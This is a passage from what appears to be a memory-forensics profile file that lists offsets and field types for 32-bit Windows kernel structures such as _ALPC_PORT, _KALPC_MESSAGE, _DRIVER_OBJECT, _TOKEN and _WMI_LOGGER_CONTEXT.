'Semaphore' : [ 0x7c, ['pointer', ['_KSEMAPHORE']]],
'DummyEvent' : [ 0x7c, ['pointer', ['_KEVENT']]],
'PortAttributes' : [ 0x80, ['_ALPC_PORT_ATTRIBUTES']],
'Lock' : [ 0xac, ['_EX_PUSH_LOCK']],
'ResourceListLock' : [ 0xb0, ['_EX_PUSH_LOCK']],
'ResourceListHead' : [ 0xb4, ['_LIST_ENTRY']],
'CompletionList' : [ 0xbc, ['pointer', ['_ALPC_COMPLETION_LIST']]],
'MessageZone' : [ 0xc0, ['pointer', ['_ALPC_MESSAGE_ZONE']]],
'CallbackObject' : [ 0xc4, ['pointer', ['_CALLBACK_OBJECT']]],
'CallbackContext' : [ 0xc8, ['pointer', ['void']]],
'CanceledQueue' : [ 0xcc, ['_LIST_ENTRY']],
'SequenceNo' : [ 0xd4, ['long']],
'u1' : [ 0xd8, ['__unnamed_19c2']],
'TargetQueuePort' : [ 0xdc, ['pointer', ['_ALPC_PORT']]],
'TargetSequencePort' : [ 0xe0, ['pointer', ['_ALPC_PORT']]],
'CachedMessage' : [ 0xe4, ['pointer', ['_KALPC_MESSAGE']]],
'MainQueueLength' : [ 0xe8, ['unsigned long']],
'PendingQueueLength' : [ 0xec, ['unsigned long']],
'LargeMessageQueueLength' : [ 0xf0, ['unsigned long']],
'CanceledQueueLength' : [ 0xf4, ['unsigned long']],
'WaitQueueLength' : [ 0xf8, ['unsigned long']],
} ],
'_OBJECT_TYPE' : [ 0x88, {
'TypeList' : [ 0x0, ['_LIST_ENTRY']],
'Name' : [ 0x8, ['_UNICODE_STRING']],
'DefaultObject' : [ 0x10, ['pointer', ['void']]],
'Index' : [ 0x14, ['unsigned char']],
'TotalNumberOfObjects' : [ 0x18, ['unsigned long']],
'TotalNumberOfHandles' : [ 0x1c, ['unsigned long']],
'HighWaterNumberOfObjects' : [ 0x20, ['unsigned long']],
'HighWaterNumberOfHandles' : [ 0x24, ['unsigned long']],
'TypeInfo' : [ 0x28, ['_OBJECT_TYPE_INITIALIZER']],
'TypeLock' : [ 0x78, ['_EX_PUSH_LOCK']],
'Key' : [ 0x7c, ['unsigned long']],
'CallbackList' : [ 0x80, ['_LIST_ENTRY']],
} ],
'__unnamed_19da' : [ 0x4, {
'QueueType' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned long')]],
'QueuePortType' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 6, native_type='unsigned long')]],
'Canceled' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Ready' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ReleaseMessage' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'SharedQuota' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'ReplyWaitReply' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'OwnerPortReference' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'ReserveReference' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'ReceiverReference' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'ViewAttributeRetrieved' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'InDispatch' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
} ],
'__unnamed_19dc' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_19da']],
'State' : [ 0x0, ['unsigned long']],
} ],
'_KALPC_MESSAGE' : [ 0x88, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'ExtensionBuffer' : [ 0x8, ['pointer', ['void']]],
'ExtensionBufferSize' : [ 0xc, ['unsigned long']],
'QuotaProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
'QuotaBlock' : [ 0x10, ['pointer', ['void']]],
'SequenceNo' : [ 0x14, ['long']],
'u1' : [ 0x18, ['__unnamed_19dc']],
'CancelSequencePort' : [ 0x1c, ['pointer', ['_ALPC_PORT']]],
'CancelQueuePort' : [ 0x20, ['pointer', ['_ALPC_PORT']]],
'CancelSequenceNo' : [ 0x24, ['long']],
'CancelListEntry' : [ 0x28, ['_LIST_ENTRY']],
'WaitingThread' : [ 0x30, ['pointer', ['_ETHREAD']]],
'Reserve' : [ 0x34, ['pointer', ['_KALPC_RESERVE']]],
'PortQueue' : [ 0x38, ['pointer', ['_ALPC_PORT']]],
'OwnerPort' : [ 0x3c, ['pointer', ['_ALPC_PORT']]],
'MessageAttributes' : [ 0x40, ['_KALPC_MESSAGE_ATTRIBUTES']],
'DataUserVa' : [ 0x5c, ['pointer', ['void']]],
'DataSystemVa' : [ 0x60, ['pointer', ['void']]],
'CommunicationInfo' : [ 0x64, ['pointer', ['_ALPC_COMMUNICATION_INFO']]],
'ConnectionPort' : [ 0x68, ['pointer', ['_ALPC_PORT']]],
'ServerThread' : [ 0x6c, ['pointer', ['_ETHREAD']]],
'PortMessage' : [ 0x70, ['_PORT_MESSAGE']],
} ],
'_REMOTE_PORT_VIEW' : [ 0xc, {
'Length' : [ 0x0, ['unsigned long']],
'ViewSize' : [ 0x4, ['unsigned long']],
'ViewBase' : [ 0x8, ['pointer', ['void']]],
} ],
'_KALPC_RESERVE' : [ 0x14, {
'OwnerPort' : [ 0x0, ['pointer', ['_ALPC_PORT']]],
'HandleTable' : [ 0x4, ['pointer', ['_ALPC_HANDLE_TABLE']]],
'Handle' : [ 0x8, ['pointer', ['void']]],
'Message' : [ 0xc, ['pointer', ['_KALPC_MESSAGE']]],
'Active' : [ 0x10, ['long']],
} ],
'_KALPC_HANDLE_DATA' : [ 0xc, {
'Flags' : [ 0x0, ['unsigned long']],
'ObjectType' : [ 0x4, ['unsigned long']],
'DuplicateContext' : [ 0x8, ['pointer', ['_OB_DUPLICATE_OBJECT_STATE']]],
} ],
'_KALPC_MESSAGE_ATTRIBUTES' : [ 0x1c, {
'ClientContext' : [ 0x0, ['pointer', ['void']]],
'ServerContext' : [ 0x4, ['pointer', ['void']]],
'PortContext' : [ 0x8, ['pointer', ['void']]],
'CancelPortContext' : [ 0xc, ['pointer', ['void']]],
'SecurityData' : [ 0x10, ['pointer', ['_KALPC_SECURITY_DATA']]],
'View' : [ 0x14, ['pointer', ['_KALPC_VIEW']]],
'HandleData' : [ 0x18, ['pointer', ['_KALPC_HANDLE_DATA']]],
} ],
'__unnamed_1a19' : [ 0x4, {
'Revoked' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Impersonated' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
} ],
'__unnamed_1a1b' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_1a19']],
} ],
'_KALPC_SECURITY_DATA' : [ 0x50, {
'HandleTable' : [ 0x0, ['pointer', ['_ALPC_HANDLE_TABLE']]],
'ContextHandle' : [ 0x4, ['pointer', ['void']]],
'OwningProcess' : [ 0x8, ['pointer', ['_EPROCESS']]],
'OwnerPort' : [ 0xc, ['pointer', ['_ALPC_PORT']]],
'DynamicSecurity' : [ 0x10, ['_SECURITY_CLIENT_CONTEXT']],
'u1' : [ 0x4c, ['__unnamed_1a1b']],
} ],
'_IO_MINI_COMPLETION_PACKET_USER' : [ 0x28, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'PacketType' : [ 0x8, ['unsigned long']],
'KeyContext' : [ 0xc, ['pointer', ['void']]],
'ApcContext' : [ 0x10, ['pointer', ['void']]],
'IoStatus' : [ 0x14, ['long']],
'IoStatusInformation' : [ 0x18, ['unsigned long']],
'MiniPacketCallback' : [ 0x1c, ['pointer', ['void']]],
'Context' : [ 0x20, ['pointer', ['void']]],
'Allocated' : [ 0x24, ['unsigned char']],
} ],
'_ALPC_DISPATCH_CONTEXT' : [ 0x20, {
'PortObject' : [ 0x0, ['pointer', ['_ALPC_PORT']]],
'Message' : [ 0x4, ['pointer', ['_KALPC_MESSAGE']]],
'CommunicationInfo' : [ 0x8, ['pointer', ['_ALPC_COMMUNICATION_INFO']]],
'TargetThread' : [ 0xc, ['pointer', ['_ETHREAD']]],
'TargetPort' : [ 0x10, ['pointer', ['_ALPC_PORT']]],
'Flags' : [ 0x14, ['unsigned long']],
'TotalLength' : [ 0x18, ['unsigned short']],
'Type' : [ 0x1a, ['unsigned short']],
'DataInfoOffset' : [ 0x1c, ['unsigned short']],
} ],
'_DRIVER_OBJECT' : [ 0xa8, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'Flags' : [ 0x8, ['unsigned long']],
'DriverStart' : [ 0xc, ['pointer', ['void']]],
'DriverSize' : [ 0x10, ['unsigned long']],
'DriverSection' : [ 0x14, ['pointer', ['void']]],
'DriverExtension' : [ 0x18, ['pointer', ['_DRIVER_EXTENSION']]],
'DriverName' : [ 0x1c, ['_UNICODE_STRING']],
'HardwareDatabase' : [ 0x24, ['pointer', ['_UNICODE_STRING']]],
'FastIoDispatch' : [ 0x28, ['pointer', ['_FAST_IO_DISPATCH']]],
'DriverInit' : [ 0x2c, ['pointer', ['void']]],
'DriverStartIo' : [ 0x30, ['pointer', ['void']]],
'DriverUnload' : [ 0x34, ['pointer', ['void']]],
'MajorFunction' : [ 0x38, ['array', 28, ['pointer', ['void']]]],
} ],
'_FILE_SEGMENT_ELEMENT' : [ 0x8, {
'Buffer' : [ 0x0, ['pointer64', ['void']]],
'Alignment' : [ 0x0, ['unsigned long long']],
} ],
'_RELATIVE_SYMLINK_INFO' : [ 0x14, {
'ExposedNamespaceLength' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned short']],
'DeviceNameLength' : [ 0x4, ['unsigned short']],
'Reserved' : [ 0x6, ['unsigned short']],
'InteriorMountPoint' : [ 0x8, ['pointer', ['_RELATIVE_SYMLINK_INFO']]],
'OpenedName' : [ 0xc, ['_UNICODE_STRING']],
} ],
'_ECP_LIST' : [ 0x10, {
'Signature' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['unsigned long']],
'EcpList' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_IOP_FILE_OBJECT_EXTENSION' : [ 0x24, {
'FoExtFlags' : [ 0x0, ['unsigned long']],
'FoExtPerTypeExtension' : [ 0x4, ['array', 7, ['pointer', ['void']]]],
'FoIoPriorityHint' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'IopIoPriorityNotSet', 1: 'IopIoPriorityVeryLow', 2: 'IopIoPriorityLow', 3: 'IopIoPriorityNormal', 4: 'IopIoPriorityHigh', 5: 'IopIoPriorityCritical', 6: 'MaxIopIoPriorityTypes'})]],
} ],
'_OPEN_PACKET' : [ 0x70, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'FileObject' : [ 0x4, ['pointer', ['_FILE_OBJECT']]],
'FinalStatus' : [ 0x8, ['long']],
'Information' : [ 0xc, ['unsigned long']],
'ParseCheck' : [ 0x10, ['unsigned long']],
'RelatedFileObject' : [ 0x14, ['pointer', ['_FILE_OBJECT']]],
'OriginalAttributes' : [ 0x18, ['pointer', ['_OBJECT_ATTRIBUTES']]],
'AllocationSize' : [ 0x20, ['_LARGE_INTEGER']],
'CreateOptions' : [ 0x28, ['unsigned long']],
'FileAttributes' : [ 0x2c, ['unsigned short']],
'ShareAccess' : [ 0x2e, ['unsigned short']],
'EaBuffer' : [ 0x30, ['pointer', ['void']]],
'EaLength' : [ 0x34, ['unsigned long']],
'Options' : [ 0x38, ['unsigned long']],
'Disposition' : [ 0x3c, ['unsigned long']],
'BasicInformation' : [ 0x40, ['pointer', ['_FILE_BASIC_INFORMATION']]],
'NetworkInformation' : [ 0x44, ['pointer', ['_FILE_NETWORK_OPEN_INFORMATION']]],
'CreateFileType' : [ 0x48, ['Enumeration', dict(target = 'long', choices = {0: 'CreateFileTypeNone', 1: 'CreateFileTypeNamedPipe', 2: 'CreateFileTypeMailslot'})]],
'MailslotOrPipeParameters' : [ 0x4c, ['pointer', ['void']]],
'Override' : [ 0x50, ['unsigned char']],
'QueryOnly' : [ 0x51, ['unsigned char']],
'DeleteOnly' : [ 0x52, ['unsigned char']],
'FullAttributes' : [ 0x53, ['unsigned char']],
'LocalFileObject' : [ 0x54, ['pointer', ['_DUMMY_FILE_OBJECT']]],
'InternalFlags' : [ 0x58, ['unsigned long']],
'DriverCreateContext' : [ 0x5c, ['_IO_DRIVER_CREATE_CONTEXT']],
} ],
'_ETW_SYSTEMTIME' : [ 0x10, {
'Year' : [ 0x0, ['unsigned short']],
'Month' : [ 0x2, ['unsigned short']],
'DayOfWeek' : [ 0x4, ['unsigned short']],
'Day' : [ 0x6, ['unsigned short']],
'Hour' : [ 0x8, ['unsigned short']],
'Minute' : [ 0xa, ['unsigned short']],
'Second' : [ 0xc, ['unsigned short']],
'Milliseconds' : [ 0xe, ['unsigned short']],
} ],
'_TIME_FIELDS' : [ 0x10, {
'Year' : [ 0x0, ['short']],
'Month' : [ 0x2, ['short']],
'Day' : [ 0x4, ['short']],
'Hour' : [ 0x6, ['short']],
'Minute' : [ 0x8, ['short']],
'Second' : [ 0xa, ['short']],
'Milliseconds' : [ 0xc, ['short']],
'Weekday' : [ 0xe, ['short']],
} ],
'_WMI_LOGGER_CONTEXT' : [ 0x238, {
'LoggerId' : [ 0x0, ['unsigned long']],
'BufferSize' : [ 0x4, ['unsigned long']],
'MaximumEventSize' : [ 0x8, ['unsigned long']],
'CollectionOn' : [ 0xc, ['long']],
'LoggerMode' : [ 0x10, ['unsigned long']],
'AcceptNewEvents' : [ 0x14, ['long']],
'GetCpuClock' : [ 0x18, ['pointer', ['void']]],
'StartTime' : [ 0x20, ['_LARGE_INTEGER']],
'LogFileHandle' : [ 0x28, ['pointer', ['void']]],
'LoggerThread' : [ 0x2c, ['pointer', ['_ETHREAD']]],
'LoggerStatus' : [ 0x30, ['long']],
'NBQHead' : [ 0x34, ['pointer', ['void']]],
'OverflowNBQHead' : [ 0x38, ['pointer', ['void']]],
'QueueBlockFreeList' : [ 0x40, ['_SLIST_HEADER']],
'GlobalList' : [ 0x48, ['_LIST_ENTRY']],
'BatchedBufferList' : [ 0x50, ['pointer', ['_WMI_BUFFER_HEADER']]],
'CurrentBuffer' : [ 0x50, ['_EX_FAST_REF']],
'LoggerName' : [ 0x54, ['_UNICODE_STRING']],
'LogFileName' : [ 0x5c, ['_UNICODE_STRING']],
'LogFilePattern' : [ 0x64, ['_UNICODE_STRING']],
'NewLogFileName' : [ 0x6c, ['_UNICODE_STRING']],
'ClockType' : [ 0x74, ['unsigned long']],
'MaximumFileSize' : [ 0x78, ['unsigned long']],
'LastFlushedBuffer' : [ 0x7c, ['unsigned long']],
'FlushTimer' : [ 0x80, ['unsigned long']],
'FlushThreshold' : [ 0x84, ['unsigned long']],
'ByteOffset' : [ 0x88, ['_LARGE_INTEGER']],
'MinimumBuffers' : [ 0x90, ['unsigned long']],
'BuffersAvailable' : [ 0x94, ['long']],
'NumberOfBuffers' : [ 0x98, ['long']],
'MaximumBuffers' : [ 0x9c, ['unsigned long']],
'EventsLost' : [ 0xa0, ['unsigned long']],
'BuffersWritten' : [ 0xa4, ['unsigned long']],
'LogBuffersLost' : [ 0xa8, ['unsigned long']],
'RealTimeBuffersDelivered' : [ 0xac, ['unsigned long']],
'RealTimeBuffersLost' : [ 0xb0, ['unsigned long']],
'SequencePtr' : [ 0xb4, ['pointer', ['long']]],
'LocalSequence' : [ 0xb8, ['unsigned long']],
'InstanceGuid' : [ 0xbc, ['_GUID']],
'FileCounter' : [ 0xcc, ['long']],
'BufferCallback' : [ 0xd0, ['pointer', ['void']]],
'PoolType' : [ 0xd4, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'ReferenceTime' : [ 0xd8, ['_ETW_REF_CLOCK']],
'Consumers' : [ 0xe8, ['_LIST_ENTRY']],
'NumConsumers' : [ 0xf0, ['unsigned long']],
'TransitionConsumer' : [ 0xf4, ['pointer', ['_ETW_REALTIME_CONSUMER']]],
'RealtimeLogfileHandle' : [ 0xf8, ['pointer', ['void']]],
'RealtimeLogfileName' : [ 0xfc, ['_UNICODE_STRING']],
'RealtimeWriteOffset' : [ 0x108, ['_LARGE_INTEGER']],
'RealtimeReadOffset' : [ 0x110, ['_LARGE_INTEGER']],
'RealtimeLogfileSize' : [ 0x118, ['_LARGE_INTEGER']],
'RealtimeLogfileUsage' : [ 0x120, ['unsigned long long']],
'RealtimeMaximumFileSize' : [ 0x128, ['unsigned long long']],
'RealtimeBuffersSaved' : [ 0x130, ['unsigned long']],
'RealtimeReferenceTime' : [ 0x138, ['_ETW_REF_CLOCK']],
'NewRTEventsLost' : [ 0x148, ['Enumeration', dict(target = 'long', choices = {0: 'EtwRtEventNoLoss', 1: 'EtwRtEventLost', 2: 'EtwRtBufferLost', 3: 'EtwRtBackupLost', 4: 'EtwRtEventLossMax'})]],
'LoggerEvent' : [ 0x14c, ['_KEVENT']],
'FlushEvent' : [ 0x15c, ['_KEVENT']],
'FlushTimeOutTimer' : [ 0x170, ['_KTIMER']],
'FlushDpc' : [ 0x198, ['_KDPC']],
'LoggerMutex' : [ 0x1b8, ['_KMUTANT']],
'LoggerLock' : [ 0x1d8, ['_EX_PUSH_LOCK']],
'BufferListSpinLock' : [ 0x1dc, ['unsigned long']],
'BufferListPushLock' : [ 0x1dc, ['_EX_PUSH_LOCK']],
'ClientSecurityContext' : [ 0x1e0, ['_SECURITY_CLIENT_CONTEXT']],
'SecurityDescriptor' : [ 0x21c, ['_EX_FAST_REF']],
'BufferSequenceNumber' : [ 0x220, ['long long']],
'Flags' : [ 0x228, ['unsigned long']],
'Persistent' : [ 0x228, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'AutoLogger' : [ 0x228, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'FsReady' : [ 0x228, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'RealTime' : [ 0x228, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Wow' : [ 0x228, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'KernelTrace' : [ 0x228, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'NoMoreEnable' : [ 0x228, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'StackTracing' : [ 0x228, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ErrorLogged' : [ 0x228, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'RealtimeLoggerContextFreed' : [ 0x228, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'RequestFlag' : [ 0x22c, ['unsigned long']],
'RequestNewFie' : [ 0x22c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'RequestUpdateFile' : [ 0x22c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'RequestFlush' : [ 0x22c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'RequestDisableRealtime' : [ 0x22c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'RequestDisconnectConsumer' : [ 0x22c, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'RequestConnectConsumer' : [ 0x22c, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'HookIdMap' : [ 0x230, ['_RTL_BITMAP']],
} ],
'_ETW_LOGGER_HANDLE' : [ 0x1, {
'DereferenceAndLeave' : [ 0x0, ['unsigned char']],
} ],
'_ETW_BUFFER_HANDLE' : [ 0x8, {
'TraceBuffer' : [ 0x0, ['pointer', ['_WMI_BUFFER_HEADER']]],
'BufferFastRef' : [ 0x4, ['pointer', ['_EX_FAST_REF']]],
} ],
'_SYSTEM_TRACE_HEADER' : [ 0x20, {
'Marker' : [ 0x0, ['unsigned long']],
'Version' : [ 0x0, ['unsigned short']],
'HeaderType' : [ 0x2, ['unsigned char']],
'Flags' : [ 0x3, ['unsigned char']],
'Header' : [ 0x4, ['unsigned long']],
'Packet' : [ 0x4, ['_WMI_TRACE_PACKET']],
'ThreadId' : [ 0x8, ['unsigned long']],
'ProcessId' : [ 0xc, ['unsigned long']],
'SystemTime' : [ 0x10, ['_LARGE_INTEGER']],
'KernelTime' : [ 0x18, ['unsigned long']],
'UserTime' : [ 0x1c, ['unsigned long']],
} ],
'_PERFINFO_TRACE_HEADER' : [ 0x18, {
'Marker' : [ 0x0, ['unsigned long']],
'Version' : [ 0x0, ['unsigned short']],
'HeaderType' : [ 0x2, ['unsigned char']],
'Flags' : [ 0x3, ['unsigned char']],
'Header' : [ 0x4, ['unsigned long']],
'Packet' : [ 0x4, ['_WMI_TRACE_PACKET']],
'TS' : [ 0x8, ['unsigned long long']],
'SystemTime' : [ 0x8, ['_LARGE_INTEGER']],
'Data' : [ 0x10, ['array', 1, ['unsigned char']]],
} ],
'_NBQUEUE_BLOCK' : [ 0x18, {
'SListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Next' : [ 0x8, ['unsigned long long']],
'Data' : [ 0x10, ['unsigned long long']],
} ],
'_KMUTANT' : [ 0x20, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'MutantListEntry' : [ 0x10, ['_LIST_ENTRY']],
'OwnerThread' : [ 0x18, ['pointer', ['_KTHREAD']]],
'Abandoned' : [ 0x1c, ['unsigned char']],
'ApcDisable' : [ 0x1d, ['unsigned char']],
} ],
'_ETW_LAST_ENABLE_INFO' : [ 0x10, {
'EnableFlags' : [ 0x0, ['_LARGE_INTEGER']],
'LoggerId' : [ 0x8, ['unsigned short']],
'Level' : [ 0xa, ['unsigned char']],
'Enabled' : [ 0xb, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'InternalFlag' : [ 0xb, ['BitField', dict(start_bit = 1, end_bit = 8, native_type='unsigned char')]],
} ],
'_TRACE_ENABLE_CONTEXT' : [ 0x8, {
'LoggerId' : [ 0x0, ['unsigned short']],
'Level' : [ 0x2, ['unsigned char']],
'InternalFlag' : [ 0x3, ['unsigned char']],
'EnableFlags' : [ 0x4, ['unsigned long']],
} ],
'_TRACE_ENABLE_CONTEXT_EX' : [ 0x10, {
'LoggerId' : [ 0x0, ['unsigned short']],
'Level' : [ 0x2, ['unsigned char']],
'InternalFlag' : [ 0x3, ['unsigned char']],
'EnableFlags' : [ 0x4, ['unsigned long']],
'EnableFlagsHigh' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'_ETW_GUID_ENTRY' : [ 0x178, {
'GuidList' : [ 0x0, ['_LIST_ENTRY']],
'RefCount' : [ 0x8, ['long']],
'Guid' : [ 0xc, ['_GUID']],
'RegListHead' : [ 0x1c, ['_LIST_ENTRY']],
'SecurityDescriptor' : [ 0x24, ['pointer', ['void']]],
'LastEnable' : [ 0x28, ['_ETW_LAST_ENABLE_INFO']],
'MatchId' : [ 0x28, ['unsigned long long']],
'ProviderEnableInfo' : [ 0x38, ['_TRACE_ENABLE_INFO']],
'EnableInfo' : [ 0x58, ['array', 8, ['_TRACE_ENABLE_INFO']]],
'FilterData' : [ 0x158, ['array', 8, ['pointer', ['_EVENT_FILTER_HEADER']]]],
} ],
'_TRACE_ENABLE_INFO' : [ 0x20, {
'IsEnabled' : [ 0x0, ['unsigned long']],
'Level' : [ 0x4, ['unsigned char']],
'Reserved1' : [ 0x5, ['unsigned char']],
'LoggerId' : [ 0x6, ['unsigned short']],
'EnableProperty' : [ 0x8, ['unsigned long']],
'Reserved2' : [ 0xc, ['unsigned long']],
'MatchAnyKeyword' : [ 0x10, ['unsigned long long']],
'MatchAllKeyword' : [ 0x18, ['unsigned long long']],
} ],
'_LUID_AND_ATTRIBUTES' : [ 0xc, {
'Luid' : [ 0x0, ['_LUID']],
'Attributes' : [ 0x8, ['unsigned long']],
} ],
'_TOKEN' : [ 0x1e0, {
'TokenSource' : [ 0x0, ['_TOKEN_SOURCE']],
'TokenId' : [ 0x10, ['_LUID']],
'AuthenticationId' : [ 0x18, ['_LUID']],
'ParentTokenId' : [ 0x20, ['_LUID']],
'ExpirationTime' : [ 0x28, ['_LARGE_INTEGER']],
'TokenLock' : [ 0x30, ['pointer', ['_ERESOURCE']]],
'ModifiedId' : [ 0x34, ['_LUID']],
'Privileges' : [ 0x40, ['_SEP_TOKEN_PRIVILEGES']],
'AuditPolicy' : [ 0x58, ['_SEP_AUDIT_POLICY']],
'SessionId' : [ 0x74, ['unsigned long']],
'UserAndGroupCount' : [ 0x78, ['unsigned long']],
'RestrictedSidCount' : [ 0x7c, ['unsigned long']],
'VariableLength' : [ 0x80, ['unsigned long']],
'DynamicCharged' : [ 0x84, ['unsigned long']],
'DynamicAvailable' : [ 0x88, ['unsigned long']],
'DefaultOwnerIndex' : [ 0x8c, ['unsigned long']],
'UserAndGroups' : [ 0x90, ['pointer', ['_SID_AND_ATTRIBUTES']]],
'RestrictedSids' : [ 0x94, ['pointer', ['_SID_AND_ATTRIBUTES']]],
'PrimaryGroup' : [ 0x98, ['pointer', ['void']]],
'DynamicPart' : [ 0x9c, ['pointer', ['unsigned long']]],
'DefaultDacl' : [ 0xa0, ['pointer', ['_ACL']]],
'TokenType' : [ 0xa4, ['Enumeration', dict(target = 'long', choices = {1: 'TokenPrimary', 2: 'TokenImpersonation'})]],
'ImpersonationLevel' : [ 0xa8, ['Enumeration', dict(target = 'long', choices = {0: 'SecurityAnonymous', 1: 'SecurityIdentification', 2: 'SecurityImpersonation', 3: 'SecurityDelegation'})]],
'TokenFlags' : [ 0xac, ['unsigned long']],
'TokenInUse' : [ 0xb0, ['unsigned char']],
'IntegrityLevelIndex' : [ 0xb4, ['unsigned long']],
'MandatoryPolicy' : [ 0xb8, ['unsigned long']],
'LogonSession' : [ 0xbc, ['pointer', ['_SEP_LOGON_SESSION_REFERENCES']]],
'OriginatingLogonSession' : [ 0xc0, ['_LUID']],
'SidHash' : [ 0xc8, ['_SID_AND_ATTRIBUTES_HASH']],
'RestrictedSidHash' : [ 0x150, ['_SID_AND_ATTRIBUTES_HASH']],
'pSecurityAttributes' : [ 0x1d8, ['pointer', ['_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION']]],
'VariablePart' : [ 0x1dc, ['unsigned long']],
} ],
'_SEP_LOGON_SESSION_REFERENCES' : [ 0x34, {
'Next' : [ 0x0, ['pointer', ['_SEP_LOGON_SESSION_REFERENCES']]],
'LogonId' : [ 0x4, ['_LUID']],
'BuddyLogonId' : [ 0xc, ['_LUID']],
'ReferenceCount' : [ 0x14, ['unsigned long']],
'Flags' : [ 0x18, ['unsigned long']],
'pDeviceMap' : [ 0x1c, ['pointer', ['_DEVICE_MAP']]],
'Token' : [ 0x20, ['pointer', ['void']]],
'AccountName' : [ 0x24, ['_UNICODE_STRING']],
'AuthorityName' : [ 0x2c, ['_UNICODE_STRING']],
} ],
'_OBJECT_HEADER' : [ 0x20, {
'PointerCount' : [ 0x0, ['long']],
'HandleCount' : [ 0x4, ['long']],
'NextToFree' : [ 0x4, ['pointer', ['void']]],
'Lock' : [ 0x8, ['_EX_PUSH_LOCK']],
'TypeIndex' : [ 0xc, ['unsigned char']],
'TraceFlags' : [ 0xd, ['unsigned char']],
'InfoMask' : [ 0xe, ['unsigned char']],
'Flags' : [ 0xf, ['unsigned char']],
'ObjectCreateInfo' : [ 0x10, ['pointer', ['_OBJECT_CREATE_INFORMATION']]],
'QuotaBlockCharged' : [ 0x10, ['pointer', ['void']]],
'SecurityDescriptor' : [ 0x14, ['pointer', ['void']]],
'Body' : [ 0x18, ['_QUAD']],
} ],
'_OBJECT_HEADER_QUOTA_INFO' : [ 0x10, {
'PagedPoolCharge' : [ 0x0, ['unsigned long']],
'NonPagedPoolCharge' : [ 0x4, ['unsigned long']],
'SecurityDescriptorCharge' : [ 0x8, ['unsigned long']],
'SecurityDescriptorQuotaBlock' : [ 0xc, ['pointer', ['void']]],
} ],
'_OBJECT_HEADER_PROCESS_INFO' : [ 0x8, {
'ExclusiveProcess' : [ 0x0, ['pointer', ['_EPROCESS']]],
'Reserved' : [ 0x4, ['unsigned long']],
} ],
'_OBJECT_HEADER_HANDLE_INFO' : [ 0x8, {
'HandleCountDataBase' : [ 0x0, ['pointer', ['_OBJECT_HANDLE_COUNT_DATABASE']]],
'SingleEntry' : [ 0x0, ['_OBJECT_HANDLE_COUNT_ENTRY']],
} ],
'_OBJECT_HEADER_NAME_INFO' : [ 0x10, {
'Directory' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY']]],
'Name' : [ 0x4, ['_UNICODE_STRING']],
'ReferenceCount' : [ 0xc, ['long']],
} ],
'_OBJECT_HEADER_CREATOR_INFO' : [ 0x10, {
